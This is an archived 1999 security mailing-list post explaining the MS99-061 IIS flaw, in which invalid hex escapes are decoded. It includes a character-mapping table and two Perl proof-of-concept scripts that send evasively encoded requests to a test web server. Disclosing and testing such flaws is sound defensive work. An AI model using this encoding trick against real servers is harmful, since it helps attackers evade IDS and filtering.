exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ms99-061.info.txt

ms99-061.info.txt
Posted Dec 30, 1999
Authored by rain forest puppy

More information on the vulnerability described in ms99-061, a problem in IIS that causes it to parse invalid escape sequences, allowing a carefully made string to bypass IDS systems, ISAPI filters, and extension handlers. Includes a perl script to test for vulnerability.

tags | perl
SHA-256 | ef40568ad6b25c2ee06d8471ee964346dcb723886938cecd3b91cb78e396a9a0

ms99-061.info.txt

Change Mirror Download
---------- Forwarded message ----------
Date: Wed, 29 Dec 1999 21:39:29 -0600 (EST)
From: ".rain.forest.puppy." <rfp@wiretrip.net>
To: bugtraq@securityfocus.com, vacuum@technotronic.com,
win2ksecadvice@listserv.ntsecurity.net
Subject: More info on MS99-061 (IIS escape character vulnerability)


I found myself curious on the exact happenings of this vulnerability, so I
decided to look into it further. Who knows, maybe another anti-IDS tactic
for whisker. :)

Anyways, the problem is that IIS parses invalid hex escape sequences. For
instance, %ff, %9a, and %0d are valid since FF, 9A, and 0D are valid
hexidecimal numbers. To be valid, it must be two chars only using the
digits A-Z, a-z, and 0-9. However, IIS was also allowing things such as
%qj, %0z, and %g4, which are not valid hexidecimal values.

So what I did was set out on a quest to find out what parses to what. I
came up with a rough table of mappings. The results come from submitting
'%1?', where '?' is the character who's ascii value is represented below:

87 -> 0 137 -> i
88 -> 1 138 -> j
89 -> 2 139 -> k
90 -> 3 140 -> l
91 -> 4 141 -> m
92 -> 5 142 -> n
93 -> 6 143 -> o
94 -> 7 144 -> p
95 -> 8 145 -> q
96 -> 9 146 -> r
129 -> a 147 -> s
130 -> b 148 -> t
131 -> c 149 -> u
132 -> d 150 -> v
133 -> e 151 -> w
134 -> f 152 -> x
135 -> g 153 -> y
136 -> h 154 -> z

This table was generated using the first included perl program (below).
Now, to test it, I used the second perl program included below to make a
substituted request for 'default.asp'. The important portion of the perl
program is:

$str="%1" . chr(132); # d
$str.="%1". chr(133); # e
$str.="%1". chr(134); # f
$str.="%1". chr(129); # a
$str.="%1". chr(149); # u
$str.="%1". chr(140); # l
$str.="%1". chr(148); # t
$str.='.';
$str.="%1". chr(129); # a
$str.="%1". chr(147); # s
$str.="%1". chr(144); # p

Here we see the request is made up of nothing bug '%1?', where ? is the
corresponding ascii character. End result? It works.

What does this allow you to bypass? My guess is anything that plays or
needs the raw filename or request. ISAPI filters and extension handlers
come to mind. Who, what, where, and how are application specific.

Just a little bit of geek info. I saw enough 'can we get more information
on this' posts that I thought I could shed a little more light on the
subject. It was tough tho, with the depth of Microsoft's explanation in
their advisories. :)

rain forest puppy
rfp@wiretrip.net / www.wiretrip.net/rfp/

-----------------------------------------------------------------

#!/usr/bin/perl
$|=1; use Socket;
$inet=inet_aton('10.0.0.1'); # webserver to test
@DXX=(); $val=0;

while($val++ < 255){
$cval="\%1".chr($val);
sendraw("GET /$cval.idc HTTP/1.0\n\n");
foreach $line (@DXX){
if($line=~/query file <b>\/([a-zA-Z0-9]+).idc<\/b>/){
print "$val -> $1\n"; last;}}}

sub sendraw { my ($pstr)=@_;
$PROTO=getprotobyname('tcp')||0;
if(!(socket(S,PF_INET,SOCK_STREAM,$PROTO))){ die("socket");}
if(connect(S,pack "SnA4x8",2,80,$inet)){
select(S); $|=1;
print $pstr; @DXX=<S>;
select(STDOUT); close(S);
return;
} else { die("not responding"); }}


-----------------------------------------------------------------------

#!/usr/bin/perl
$|=1; use Socket;
$inet=inet_aton('10.0.0.1'); # webserver to test
@DXX=(); $val=0;

$str="%1".chr(132); # d
$str.="%1".chr(133); # e
$str.="%1".chr(134); # f
$str.="%1".chr(129); # a
$str.="%1".chr(149); # u
$str.="%1".chr(140); # l
$str.="%1".chr(148); # t
$str.='.';
$str.="%1".chr(129); # a
$str.="%1".chr(147); # s
$str.="%1".chr(144); # p

sendraw("GET /$str HTTP/1.0\n\n");
print @DXX;

sub sendraw { # raw network functions stay in here
my ($pstr)=@_;
$PROTO=getprotobyname('tcp')||0;
if(!(socket(S,PF_INET,SOCK_STREAM,$PROTO))){ die("socket");}
if(connect(S,pack "SnA4x8",2,80,$inet)){
select(S); $|=1;
print $pstr; @DXX=<S>;
select(STDOUT); close(S);
return;
} else { die("not responding"); }}



Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close